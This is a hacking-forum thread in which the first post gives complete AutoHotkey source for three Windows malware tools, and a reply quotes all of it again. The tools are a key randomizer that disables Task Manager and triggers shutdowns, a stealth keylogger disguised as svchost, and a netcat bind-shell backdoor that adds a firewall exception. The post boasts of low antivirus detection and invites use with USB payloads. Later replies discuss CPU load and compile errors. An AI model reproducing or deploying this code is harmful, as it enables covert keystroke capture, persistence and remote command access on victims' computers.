sablefoxx Posted December 9, 2008 Share Posted December 9, 2008 WARNING VERY LONG POST! For sometime now, i've been coding stuff in c, in fact i wrote versions of keyl and keyr in c, then i found ahk while trying to find a way to install my cmdo payload in a single .exe, turns out ahk has been used on this forum before, but i forgot about it until a few days ago. AHK is an awesome scripting lang that takes all the hard work out of keyboard hooks! So i re-wrote the apps, and here is the ahk source code, so everyone can learn how fun and easy this scripting lang is. Post bugs if you find them, and have fun! Feel free to hack/mod/use this code anyway you want (works nicely with usb payloads). :) None of these programs are illegal. Morality and legality lie in the application of knowledge, not in the information itself. PM/IRC/AIM me with questions. PROGRAMS AND FEATURES 1. Keyr -Randomizes Keys on the keyboard -Adds itself to startup (regkey) -Works on WinXP / Vista -Disables Task Mgr (regkey) -Press WinKey + X to quit -Only about 10% of AntiVirus found it (VirusTotal) [Download keyr v1] MD5...: de40e57473c719d84da9b1a9e2527a86 2. Keyl -Your basic keylogger, saves keystrokes to C:\WINDOWS\keyl.txt -Adds itself to startup (RegKey) -Completely Stealthed -Looks like svchost while running -Works on XP / Vista -Press WinKey + X to quit -Only about 5% of AntiVirus found it (VirusTotal) [Download keyl v1.1] MD5...: ebb7ab566064661707956a64be7f01b3 3. Cmdo -Updated Cmdo Payload -Installs a Netcat backdoor (reverse shell) -Single .exe Install File -Adds itself to startup (regkey) -Completely Stealthed -In XP adds itself to the firewall exceptions list, and hides itself from the GUI -Easy to use Auto Connect Script -Downside is nc.exe has 68% detection rate (VirusTotal) [Download cmdo v1] MD5...: 260f8f4566635734a8c663358752c108 AHK SOURCE CODE So basically for all of them, there is the actual .exe's (contain the payload), and the install file, the install file only needs to be run once, and it adds regkeys/makes dirs/sets attribs/etc, i commented the code best i could >Keyr keyr_install.exe ;Install Keyr.exe into root of C: ;Keyr Script has to be compiled first! #NoTrayIcon FileInstall, .\keyr.exe, C:\keyr.exe ;add to startup RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,keyr,C:\keyr.exe ;disable task mgr RegWrite REG_DWORD,HKEY_CURRENT_USER,software\microsoft\windows\currentversion\policies\system,DisableTaskMgr,1 FileSetAttrib, +SH, C:\keyr.exe Run C:\keyr.exe ExitApp keyr.exe ;KeyStroke Randomizer ;keyr.exe v1.0 ;By SableFoXx #NoEnv #NoTrayIcon #InstallKeybdHook #x:: MsgBox, Exit Function Invoked ExitApp ;---------------- ; ALPHA KEYS ;---------------- ; The $ stops recusrion $a::GetAlpha() $b::GetAlpha() $c::GetAlpha() $d::GetAlpha() $e::GetAlpha() $f::GetAlpha() $g::GetAlpha() $h::GetAlpha() $i::GetAlpha() $j::GetAlpha() $k::GetAlpha() $l::GetAlpha() $m::GetAlpha() $n::GetAlpha() $o::GetAlpha() $p::GetAlpha() $q::GetAlpha() $r::GetAlpha() $s::GetAlpha() $t::GetAlpha() $u::GetAlpha() $v::GetAlpha() $w::GetAlpha() ;$x::GetAlpha() - Only if you're evil $y::GetAlpha() $z::GetAlpha() ; Don't Forget CAPS! $+a::GetAlpha() $+b::GetAlpha() $+c::GetAlpha() $+d::GetAlpha() $+e::GetAlpha() $+f::GetAlpha() $+g::GetAlpha() $+h::GetAlpha() $+i::GetAlpha() $+j::GetAlpha() $+k::GetAlpha() $+l::GetAlpha() $+m::GetAlpha() $+n::GetAlpha() $+o::GetAlpha() $+p::GetAlpha() $+q::GetAlpha() $+r::GetAlpha() $+s::GetAlpha() $+t::GetAlpha() $+u::GetAlpha() $+v::GetAlpha() $+w::GetAlpha() $+x::GetAlpha() $+y::GetAlpha() $+z::GetAlpha() CapsLock::MsgBox, WARNING: This Button Does Nothing! ;---------------- ; NUM KEYS ;---------------- $0::GetNum() $1::GetNum() $2::GetNum() $3::GetNum() $4::GetNum() $5::GetNum() $6::GetNum() $7::GetNum() $8::GetNum() $9::GetNum() $Numpad0::GetNum() $Numpad1::GetNum() $Numpad2::GetNum() $Numpad3::GetNum() $Numpad4::GetNum() $Numpad5::GetNum() $Numpad6::GetNum() $Numpad7::GetNum() $Numpad8::GetNum() $Numpad9::GetNum() ;Fun-Sions GetNum(){ Random, num, 0, 10 if(num = 10) Shutdown, 4 else SendInput, %num% } GetAlpha(){ ; I wish i could so a switch() Random, alpha, 1, 26 If(alpha = 1) SendInput, a If(alpha = 2) SendInput, b If(alpha = 3) SendInput, c If(alpha = 4) SendInput, d If(alpha = 5) SendInput, e If(alpha = 6) SendInput, f If(alpha = 7) SendInput, g If(alpha = 8) SendInput, h If(alpha = 9) SendInput, i If(alpha = 10) SendInput, j If(alpha = 11) SendInput, k If(alpha = 12) SendInput, l If(alpha = 13) SendInput, m If(alpha = 14) SendInput, n If(alpha = 15) SendInput, o If(alpha = 16) SendInput, p If(alpha = 17) SendInput, q If(alpha = 18) SendInput, r If(alpha = 19) SendInput, s If(alpha = 20) SendInput, t If(alpha = 21) SendInput, u If(alpha = 22) SendInput, v If(alpha = 23) SendInput, w If(alpha = 24) SendInput, x If(alpha = 25) SendInput, y If(alpha = 26) SendInput, z } ; -=d0tmayhem=- >keyl keyl_install.exe ;Install Svchost.exe into the root C:\ ;Keyl Script has to be compiled first, ;and renamed to svchost, after being compiled ;============================================== #NoTrayIcon ;Remove old one IfNotExist, C:\svchost.exe, goto install SendInput, #x Sleep, 1000 FileSetAttrib, -SH, C:\svchost.exe install: FileInstall, .\svhost.exe, C:\svhost.exe, 1 RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\svchost.exe FileSetAttrib, +SH, C:\svchost.exe Run, C:\svchost.exe ExitApp keyl.exe ;======================= ; Keylogger (keyl.exe) ; By SableFoXx ; v1.1 ;======================= #NoEnv #NoTrayIcon #InstallKeybdHook #SingleInstance, Force SetWorkingDir %SystemRoot% FileAppend, `n[%A_MM%/%A_DD%/%A_YYYY% %A_hour%:%A_min%], C:\WINDOWS\keyl.txt Spc := " " #x:: ;WinKey + X to stop program MsgBox, 0, -=d0tmayhem=-, Keyl has been stopped, 10 ExitApp ;---------------- ; ALPHA KEYS ;---------------- $a::AlphaKey("a", "A") $b::AlphaKey("b", "B") $c::AlphaKey("c", "C") $d::AlphaKey("d", "D") $e::AlphaKey("e", "E") $f::AlphaKey("f", "F") $g::AlphaKey("g", "G") $h::AlphaKey("h", "H") $i::AlphaKey("i", "I") $j::AlphaKey("j", "J") $k::AlphaKey("k", "K") $l::AlphaKey("l", "L") $m::AlphaKey("m", "M") $n::AlphaKey("n", "N") $o::AlphaKey("o", "O") $p::AlphaKey("p", "P") $q::AlphaKey("q", "Q") $r::AlphaKey("r", "R") $s::AlphaKey("s", "S") $t::AlphaKey("t", "T") $u::AlphaKey("u", "U") $v::AlphaKey("v", "V") $w::AlphaKey("w", "W") $x::AlphaKey("x", "X") $y::AlphaKey("y", "Y") $z::AlphaKey("z", "Z") ;**Caps Keys** $+a::TransKey("+a", "A") $+b::TransKey("+b", "B") $+c::TransKey("+c", "C") $+d::TransKey("+d", "D") $+e::TransKey("+e", "E") $+f::TransKey("+f", "F") $+g::TransKey("+g", "G") $+h::TransKey("+h", "H") $+i::TransKey("+i", "I") $+j::TransKey("+j", "J") $+k::TransKey("+k", "K") $+l::TransKey("+l", "L") $+m::TransKey("+m", "M") $+n::TransKey("+n", "N") $+o::TransKey("+o", "O") $+p::TransKey("+p", "P") $+q::TransKey("+q", "Q") $+r::TransKey("+r", "R") $+s::TransKey("+s", "S") $+t::TransKey("+t", "T") $+u::TransKey("+u", "U") $+v::TransKey("+v", "V") $+w::TransKey("+w", "W") $+x::TransKey("+x", "X") $+y::TransKey("+y", "Y") $+z::TransKey("+z", "Z") ;---------------- ; NUM KEYS ;---------------- $0::GenKey("0") $1::GenKey("1") $2::GenKey("2") $3::GenKey("3") $4::GenKey("4") $5::GenKey("5") $6::GenKey("6") $7::GenKey("7") $8::GenKey("8") $9::GenKey("9") ;**Numpad Keys** $Numpad0::GenKey("0") $Numpad1::GenKey("1") $Numpad2::GenKey("2") $Numpad3::GenKey("3") $Numpad4::GenKey("4") $Numpad5::GenKey("5") $Numpad6::GenKey("6") $Numpad7::GenKey("7") $Numpad8::GenKey("8") $Numpad9::GenKey("9") ;**NumPad Symbls** $NumpadDot::GenKey(".") $NumpadDiv::GenKey("/") $NumpadSub::GenKey("-") $NumpadMult::GenKey("*") $NumpadAdd::ModfKey("+") $NumpadDel::ModfKey("Del") $NumpadEnd::ModfKey("End") $NumpadHome::ModfKey("Home") $NumpadPgUp::ModfKey("PgUp") $NumpadPgDn::ModfKey("PgDn") $NumpadIns::ModfKey("Insert") $NumpadEnter::ModfKey("Enter") ;---------------- ; FUNC KEYS ;---------------- $F1::ModfKey("F1") $F2::ModfKey("F2") $F3::ModfKey("F3") $F4::ModfKey("F4") $F5::ModfKey("F5") $F6::ModfKey("F6") $F7::ModfKey("F7") $F8::ModfKey("F8") $F9::ModfKey("F9") $F10::ModfKey("F10") $F11::ModfKey("F11") $F12::ModfKey("F12") ;---------------- ; SYBL KEYS ;---------------- $+0::TransKey("+0", ")") $+3::TransKey("+3", "#") $+4::TransKey("+4", "$") $+5::TransKey("+5", "%") $+6::TransKey("+6", "^") $+7::TransKey("+7", "&") $+8::TransKey("+8", "*") $+9::TransKey("+9", "(") $-::GenKey("-") $=::GenKey("=") $[::GenKey("[") $]::GenKey("]") $;::GenKey(";") $'::GenKey("'") $,::GenKey(",") $.::GenKey(".") $/::GenKey("/") $\::GenKey("\") $+-::GenKey("_") $+`::GenKey("~") $+;::GenKey(":") $+,::GenKey("<") $+.::GenKey(">") $+/::GenKey("?") $+\::GenKey("|") $+[::ModfKey("{") $+]::ModfKey("}") $+=::ModfKey("+") $`::TransKey("``", "``") ;---------------- ; SPCL KEYS ;---------------- ;These are used by ahotkey ;and need SendRaw to work $+1:: SendRaw, ! FileAppend, !, C:\WINDOWS\keyl.txt Return $+2:: SendRaw, @ FileAppend, @, C:\WINDOWS\keyl.txt Return $+':: SendRaw, " FileAppend, ", C:\WINDOWS\keyl.txt Return ;---------------- ; MODF KEYS ;---------------- $!::ModfKey("Alt") $^::ModfKey("Ctrl") $Tab::ModfKey("Tab") $End::ModfKey("End") $Home::ModfKey("Home") $PgUp::ModfKey("PgUp") $PgDn::ModfKey("PgDn") $Enter::ModfKey("Enter") $Pause::ModfKey("Pause") $+Pause::ModfKey("Break") $Insert::ModfKey("Insert") $Delete::ModfKey("Delete") $Backspace::ModfKey("Backspace") $PrintScreen::ModfKey("PrintScreen") $CapsLock::CapsLock() $Space:: SendInput, {Space} FileAppend, %Spc%, C:\WINDOWS\keyl.txt Return ;======================================================== ; FUNCTIONS ;======================================================== ;GenKey - Generic Key, takes one argument (the keystroke), appends same value to log ;Alpahkey - Takes the lower(akey)/upper(ukey) case alpha value and returns a lower, or upper ; depending on the state in which CapsLock is set ;TransKey - Translate Key, takes two arguments, the first is the raw keystroke (skey) and ; the secound is the alrdy translated key you want appended to the log file (xkey) ;ModfKey - Modifer Key, these are your ALT, WIN, and TAB keys, the arg should be the string you ; want passed to SendInput, Modf key strokes are marked with "[" and "]" in the log file ;CapsLock - First finds what state the CapsLock is in, then toggles it and appends the log ; file with either [CAPS-ON] or [CAPS-OFF] GenKey(gkey){ SendInput, %gkey% FileAppend, %gkey%, C:\WINDOWS\keyl.txt } AlphaKey(akey, ukey){ state := GetKeyState("Capslock", "T") if(state == "0"){ SendInput, %akey% FileAppend, %akey%, C:\WINDOWS\keyl.txt }else{ SendInput, %ukey% FileAppend, %ukey%, C:\WINDOWS\keyl.txt } } TransKey(skey, xkey){ SendInput, %skey% FileAppend, %xkey%, C:\WINDOWS\keyl.txt } ModfKey(mkey){ SendInput, {%mkey%} FileAppend, [%mkey%], C:\WINDOWS\keyl.txt } CapsLock(){ state := GetKeyState("Capslock", "T") if(state == "1"){ SetCapsLockState, Off FileAppend, [CAPS-OFF], C:\WINDOWS\keyl.txt }else{ SetCapsLockState, On FileAppend, [CAPS-ON], C:\WINDOWS\keyl.txt } } ; -=d0tmayhem=- >Cmdo [Download .exes] cmdo_install.exe ;Setup Cmdo Payload ;By SableFoXx #NoEnv #NoTrayIcon FileCreateDir, C:\cmdo FileSetAttrib, +SH, C:\cmdo FileInstall, .\cmdo.exe, C:\cmdo\cmdo.exe FileInstall, .\hidec.exe, C:\cmdo\hidec.exe FileInstall, .\nc.exe, C:\cmdo\nc.exe FileSetAttrib, +SH, C:\cmdo\cmdo.exe FileSetAttrib, +SH, C:\cmdo\hidec.exe FileSetAttrib, +SH, C:\cmdo\nc.exe ;Startup Key XP / VISTA RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\cmdo\cmdo.exe IfExist C:\WINDOWS\system32\wuapp.exe goto done xp: ;XP Firewall Key RegWrite REG_SZ,HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,C:\cmdo\nc.exe,C:\cmdo\nc.exe:*:Enabled:@xpsp2res.dll,-22019 goto done done: Run, C:\cmdo\cmdo.exe ExitApp cmdo.exe ;Cmdo.exe ;by SableFoXx ;Runs NC #NoEnv #NoTrayIcon #SingleInstance, Force Run, C:\cmdo\hidec.exe nc.exe -l -t -p 69 -d -e cmd.exe ExitApp Information is Free Damn that was a long post :) Quote Link to comment Share on other sites More sharing options...
X3N Posted December 10, 2008 Share Posted December 10, 2008 WARNING VERY LONG POST! For sometime now, i've been coding stuff in c, in fact i wrote versions of keyl and keyr in c, then i found ahk while trying to find a way to install my cmdo payload in a single .exe, turns out ahk has been used on this forum before, but i forgot about it until a few days ago. AHK is an awesome scripting lang that takes all the hard work out of keyboard hooks! So i re-wrote the apps, and here is the ahk source code, so everyone can learn how fun and easy this scripting lang is. Post bugs if you find them, and have fun! Feel free to hack/mod/use this code anyway you want (works nicely with usb payloads). :) None of these programs are illegal. Morality and legality lie in the application of knowledge, not in the information itself. PM/IRC/AIM me with questions. PROGRAMS AND FEATURES 1. Keyr -Randomizes Keys on the keyboard -Adds itself to startup (regkey) -Works on WinXP / Vista -Disables Task Mgr (regkey) -Press WinKey + X to quit -Only about 10% of AntiVirus found it (VirusTotal) [Download keyr v1] MD5...: de40e57473c719d84da9b1a9e2527a86 2. Keyl -Your basic keylogger, saves keystrokes to C:\WINDOWS\keyl.txt -Adds itself to startup (RegKey) -Completely Stealthed -Looks like svchost while running -Works on XP / Vista -Press WinKey + X to quit -Only about 5% of AntiVirus found it (VirusTotal) [Download keyl v1.1] MD5...: ebb7ab566064661707956a64be7f01b3 3. Cmdo -Updated Cmdo Payload -Installs a Netcat backdoor (reverse shell) -Single .exe Install File -Adds itself to startup (regkey) -Completely Stealthed -In XP adds itself to the firewall exceptions list, and hides itself from the GUI -Easy to use Auto Connect Script -Downside is nc.exe has 68% detection rate (VirusTotal) [Download cmdo v1] MD5...: 260f8f4566635734a8c663358752c108 AHK SOURCE CODE So basically for all of them, there is the actual .exe's (contain the payload), and the install file, the install file only needs to be run once, and it adds regkeys/makes dirs/sets attribs/etc, i commented the code best i could >Keyr keyr_install.exe ;Install Keyr.exe into root of C: ;Keyr Script has to be compiled first! #NoTrayIcon FileInstall, .\keyr.exe, C:\keyr.exe ;add to startup RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,keyr,C:\keyr.exe ;disable task mgr RegWrite REG_DWORD,HKEY_CURRENT_USER,software\microsoft\windows\currentversion\policies\system,DisableTaskMgr,1 FileSetAttrib, +SH, C:\keyr.exe Run C:\keyr.exe ExitApp keyr.exe ;KeyStroke Randomizer ;keyr.exe v1.0 ;By SableFoXx #NoEnv #NoTrayIcon #InstallKeybdHook #x:: MsgBox, Exit Function Invoked ExitApp ;---------------- ; ALPHA KEYS ;---------------- ; The $ stops recusrion $a::GetAlpha() $b::GetAlpha() $c::GetAlpha() $d::GetAlpha() $e::GetAlpha() $f::GetAlpha() $g::GetAlpha() $h::GetAlpha() $i::GetAlpha() $j::GetAlpha() $k::GetAlpha() $l::GetAlpha() $m::GetAlpha() $n::GetAlpha() $o::GetAlpha() $p::GetAlpha() $q::GetAlpha() $r::GetAlpha() $s::GetAlpha() $t::GetAlpha() $u::GetAlpha() $v::GetAlpha() $w::GetAlpha() ;$x::GetAlpha() - Only if you're evil $y::GetAlpha() $z::GetAlpha() ; Don't Forget CAPS! $+a::GetAlpha() $+b::GetAlpha() $+c::GetAlpha() $+d::GetAlpha() $+e::GetAlpha() $+f::GetAlpha() $+g::GetAlpha() $+h::GetAlpha() $+i::GetAlpha() $+j::GetAlpha() $+k::GetAlpha() $+l::GetAlpha() $+m::GetAlpha() $+n::GetAlpha() $+o::GetAlpha() $+p::GetAlpha() $+q::GetAlpha() $+r::GetAlpha() $+s::GetAlpha() $+t::GetAlpha() $+u::GetAlpha() $+v::GetAlpha() $+w::GetAlpha() $+x::GetAlpha() $+y::GetAlpha() $+z::GetAlpha() CapsLock::MsgBox, WARNING: This Button Does Nothing! ;---------------- ; NUM KEYS ;---------------- $0::GetNum() $1::GetNum() $2::GetNum() $3::GetNum() $4::GetNum() $5::GetNum() $6::GetNum() $7::GetNum() $8::GetNum() $9::GetNum() $Numpad0::GetNum() $Numpad1::GetNum() $Numpad2::GetNum() $Numpad3::GetNum() $Numpad4::GetNum() $Numpad5::GetNum() $Numpad6::GetNum() $Numpad7::GetNum() $Numpad8::GetNum() $Numpad9::GetNum() ;Fun-Sions GetNum(){ Random, num, 0, 10 if(num = 10) Shutdown, 4 else SendInput, %num% } GetAlpha(){ ; I wish i could so a switch() Random, alpha, 1, 26 If(alpha = 1) SendInput, a If(alpha = 2) SendInput, b If(alpha = 3) SendInput, c If(alpha = 4) SendInput, d If(alpha = 5) SendInput, e If(alpha = 6) SendInput, f If(alpha = 7) SendInput, g If(alpha = 8) SendInput, h If(alpha = 9) SendInput, i If(alpha = 10) SendInput, j If(alpha = 11) SendInput, k If(alpha = 12) SendInput, l If(alpha = 13) SendInput, m If(alpha = 14) SendInput, n If(alpha = 15) SendInput, o If(alpha = 16) SendInput, p If(alpha = 17) SendInput, q If(alpha = 18) SendInput, r If(alpha = 19) SendInput, s If(alpha = 20) SendInput, t If(alpha = 21) SendInput, u If(alpha = 22) SendInput, v If(alpha = 23) SendInput, w If(alpha = 24) SendInput, x If(alpha = 25) SendInput, y If(alpha = 26) SendInput, z } ; -=d0tmayhem=- >keyl keyl_install.exe ;Install Svchost.exe into the root C:\ ;Keyl Script has to be compiled first, ;and renamed to svchost, after being compiled ;============================================== #NoTrayIcon ;Remove old one IfNotExist, C:\svchost.exe, goto install SendInput, #x Sleep, 1000 FileSetAttrib, -SH, C:\svchost.exe install: FileInstall, .\svhost.exe, C:\svhost.exe, 1 RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\svchost.exe FileSetAttrib, +SH, C:\svchost.exe Run, C:\svchost.exe ExitApp keyl.exe ;======================= ; Keylogger (keyl.exe) ; By SableFoXx ; v1.1 ;======================= #NoEnv #NoTrayIcon #InstallKeybdHook #SingleInstance, Force SetWorkingDir %SystemRoot% FileAppend, `n[%A_MM%/%A_DD%/%A_YYYY% %A_hour%:%A_min%], C:\WINDOWS\keyl.txt Spc := " " #x:: ;WinKey + X to stop program MsgBox, 0, -=d0tmayhem=-, Keyl has been stopped, 10 ExitApp ;---------------- ; ALPHA KEYS ;---------------- $a::AlphaKey("a", "A") $b::AlphaKey("b", "B") $c::AlphaKey("c", "C") $d::AlphaKey("d", "D") $e::AlphaKey("e", "E") $f::AlphaKey("f", "F") $g::AlphaKey("g", "G") $h::AlphaKey("h", "H") $i::AlphaKey("i", "I") $j::AlphaKey("j", "J") $k::AlphaKey("k", "K") $l::AlphaKey("l", "L") $m::AlphaKey("m", "M") $n::AlphaKey("n", "N") $o::AlphaKey("o", "O") $p::AlphaKey("p", "P") $q::AlphaKey("q", "Q") $r::AlphaKey("r", "R") $s::AlphaKey("s", "S") $t::AlphaKey("t", "T") $u::AlphaKey("u", "U") $v::AlphaKey("v", "V") $w::AlphaKey("w", "W") $x::AlphaKey("x", "X") $y::AlphaKey("y", "Y") $z::AlphaKey("z", "Z") ;**Caps Keys** $+a::TransKey("+a", "A") $+b::TransKey("+b", "B") $+c::TransKey("+c", "C") $+d::TransKey("+d", "D") $+e::TransKey("+e", "E") $+f::TransKey("+f", "F") $+g::TransKey("+g", "G") $+h::TransKey("+h", "H") $+i::TransKey("+i", "I") $+j::TransKey("+j", "J") $+k::TransKey("+k", "K") $+l::TransKey("+l", "L") $+m::TransKey("+m", "M") $+n::TransKey("+n", "N") $+o::TransKey("+o", "O") $+p::TransKey("+p", "P") $+q::TransKey("+q", "Q") $+r::TransKey("+r", "R") $+s::TransKey("+s", "S") $+t::TransKey("+t", "T") $+u::TransKey("+u", "U") $+v::TransKey("+v", "V") $+w::TransKey("+w", "W") $+x::TransKey("+x", "X") $+y::TransKey("+y", "Y") $+z::TransKey("+z", "Z") ;---------------- ; NUM KEYS ;---------------- $0::GenKey("0") $1::GenKey("1") $2::GenKey("2") $3::GenKey("3") $4::GenKey("4") $5::GenKey("5") $6::GenKey("6") $7::GenKey("7") $8::GenKey("8") $9::GenKey("9") ;**Numpad Keys** $Numpad0::GenKey("0") $Numpad1::GenKey("1") $Numpad2::GenKey("2") $Numpad3::GenKey("3") $Numpad4::GenKey("4") $Numpad5::GenKey("5") $Numpad6::GenKey("6") $Numpad7::GenKey("7") $Numpad8::GenKey("8") $Numpad9::GenKey("9") ;**NumPad Symbls** $NumpadDot::GenKey(".") $NumpadDiv::GenKey("/") $NumpadSub::GenKey("-") $NumpadMult::GenKey("*") $NumpadAdd::ModfKey("+") $NumpadDel::ModfKey("Del") $NumpadEnd::ModfKey("End") $NumpadHome::ModfKey("Home") $NumpadPgUp::ModfKey("PgUp") $NumpadPgDn::ModfKey("PgDn") $NumpadIns::ModfKey("Insert") $NumpadEnter::ModfKey("Enter") ;---------------- ; FUNC KEYS ;---------------- $F1::ModfKey("F1") $F2::ModfKey("F2") $F3::ModfKey("F3") $F4::ModfKey("F4") $F5::ModfKey("F5") $F6::ModfKey("F6") $F7::ModfKey("F7") $F8::ModfKey("F8") $F9::ModfKey("F9") $F10::ModfKey("F10") $F11::ModfKey("F11") $F12::ModfKey("F12") ;---------------- ; SYBL KEYS ;---------------- $+0::TransKey("+0", ")") $+3::TransKey("+3", "#") $+4::TransKey("+4", "$") $+5::TransKey("+5", "%") $+6::TransKey("+6", "^") $+7::TransKey("+7", "&") $+8::TransKey("+8", "*") $+9::TransKey("+9", "(") $-::GenKey("-") $=::GenKey("=") $[::GenKey("[") $]::GenKey("]") $;::GenKey(";") $'::GenKey("'") $,::GenKey(",") $.::GenKey(".") $/::GenKey("/") $\::GenKey("\") $+-::GenKey("_") $+`::GenKey("~") $+;::GenKey(":") $+,::GenKey("<") $+.::GenKey(">") $+/::GenKey("?") $+\::GenKey("|") $+[::ModfKey("{") $+]::ModfKey("}") $+=::ModfKey("+") $`::TransKey("``", "``") ;---------------- ; SPCL KEYS ;---------------- ;These are used by ahotkey ;and need SendRaw to work $+1:: SendRaw, ! FileAppend, !, C:\WINDOWS\keyl.txt Return $+2:: SendRaw, @ FileAppend, @, C:\WINDOWS\keyl.txt Return $+':: SendRaw, " FileAppend, ", C:\WINDOWS\keyl.txt Return ;---------------- ; MODF KEYS ;---------------- $!::ModfKey("Alt") $^::ModfKey("Ctrl") $Tab::ModfKey("Tab") $End::ModfKey("End") $Home::ModfKey("Home") $PgUp::ModfKey("PgUp") $PgDn::ModfKey("PgDn") $Enter::ModfKey("Enter") $Pause::ModfKey("Pause") $+Pause::ModfKey("Break") $Insert::ModfKey("Insert") $Delete::ModfKey("Delete") $Backspace::ModfKey("Backspace") $PrintScreen::ModfKey("PrintScreen") $CapsLock::CapsLock() $Space:: SendInput, {Space} FileAppend, %Spc%, C:\WINDOWS\keyl.txt Return ;======================================================== ; FUNCTIONS ;======================================================== ;GenKey - Generic Key, takes one argument (the keystroke), appends same value to log ;Alpahkey - Takes the lower(akey)/upper(ukey) case alpha value and returns a lower, or upper ; depending on the state in which CapsLock is set ;TransKey - Translate Key, takes two arguments, the first is the raw keystroke (skey) and ; the secound is the alrdy translated key you want appended to the log file (xkey) ;ModfKey - Modifer Key, these are your ALT, WIN, and TAB keys, the arg should be the string you ; want passed to SendInput, Modf key strokes are marked with "[" and "]" in the log file ;CapsLock - First finds what state the CapsLock is in, then toggles it and appends the log ; file with either [CAPS-ON] or [CAPS-OFF] GenKey(gkey){ SendInput, %gkey% FileAppend, %gkey%, C:\WINDOWS\keyl.txt } AlphaKey(akey, ukey){ state := GetKeyState("Capslock", "T") if(state == "0"){ SendInput, %akey% FileAppend, %akey%, C:\WINDOWS\keyl.txt }else{ SendInput, %ukey% FileAppend, %ukey%, C:\WINDOWS\keyl.txt } } TransKey(skey, xkey){ SendInput, %skey% FileAppend, %xkey%, C:\WINDOWS\keyl.txt } ModfKey(mkey){ SendInput, {%mkey%} FileAppend, [%mkey%], C:\WINDOWS\keyl.txt } CapsLock(){ state := GetKeyState("Capslock", "T") if(state == "1"){ SetCapsLockState, Off FileAppend, [CAPS-OFF], C:\WINDOWS\keyl.txt }else{ SetCapsLockState, On FileAppend, [CAPS-ON], C:\WINDOWS\keyl.txt } } ; -=d0tmayhem=- >Cmdo [Download .exes] cmdo_install.exe ;Setup Cmdo Payload ;By SableFoXx #NoEnv #NoTrayIcon FileCreateDir, C:\cmdo FileSetAttrib, +SH, C:\cmdo FileInstall, .\cmdo.exe, C:\cmdo\cmdo.exe FileInstall, .\hidec.exe, C:\cmdo\hidec.exe FileInstall, .\nc.exe, C:\cmdo\nc.exe FileSetAttrib, +SH, C:\cmdo\cmdo.exe FileSetAttrib, +SH, C:\cmdo\hidec.exe FileSetAttrib, +SH, C:\cmdo\nc.exe ;Startup Key XP / VISTA RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\cmdo\cmdo.exe IfExist C:\WINDOWS\system32\wuapp.exe goto done xp: ;XP Firewall Key RegWrite REG_SZ,HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,C:\cmdo\nc.exe,C:\cmdo\nc.exe:*:Enabled:@xpsp2res.dll,-22019 goto done done: Run, C:\cmdo\cmdo.exe ExitApp cmdo.exe ;Cmdo.exe ;by SableFoXx ;Runs NC #NoEnv #NoTrayIcon #SingleInstance, Force Run, C:\cmdo\hidec.exe nc.exe -l -t -p 69 -d -e cmd.exe ExitApp Information is Free Damn that was a long post :) whats the cpu load for the keylogger? Quote Link to comment Share on other sites More sharing options...
jollyrancher82 Posted December 10, 2008 Share Posted December 10, 2008 Did you really feel the need to quote the WHOLE source? Quote Link to comment Share on other sites More sharing options...
X3N Posted December 10, 2008 Share Posted December 10, 2008 Did you really feel the need to quote the WHOLE source? why not? Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted December 10, 2008 Author Share Posted December 10, 2008 Almost no CPU load, takes about 4k memory Quote Link to comment Share on other sites More sharing options...
jollyrancher82 Posted December 11, 2008 Share Posted December 11, 2008 why not? Because everyone needs to scroll further down to read your post and further posts there after. Quote Link to comment Share on other sites More sharing options...
hardhittertennis Posted December 31, 2008 Share Posted December 31, 2008 Just a suggestion, dont put the keylogger on a computer that someone will play an fps on. I was testing it out and when i played a game it would try and record every "w" lets say if you are moving forward so it takes a LONG time to move in a game lol but besides that, great programs! Quote Link to comment Share on other sites More sharing options...
markmonster Posted June 19, 2009 Share Posted June 19, 2009 I'm new to AutoIT. Coming from C. Im getting a compilation error that reads: "Unterminated string" with this line of code $'::GenKey("'") Is there supposed to be an escape sequence for the single quote? Edit: I'm such an idiot. This is Auto Hot Key. No AutoIT!! Quote Link to comment Share on other sites More sharing options...
sem1845 Posted June 20, 2009 Share Posted June 20, 2009 your link isn't working for me :( Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted June 22, 2009 Author Share Posted June 22, 2009 Thats why i posted the source code, all of them (updated versions) can be found in Attack PE (see USB Hacks). Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.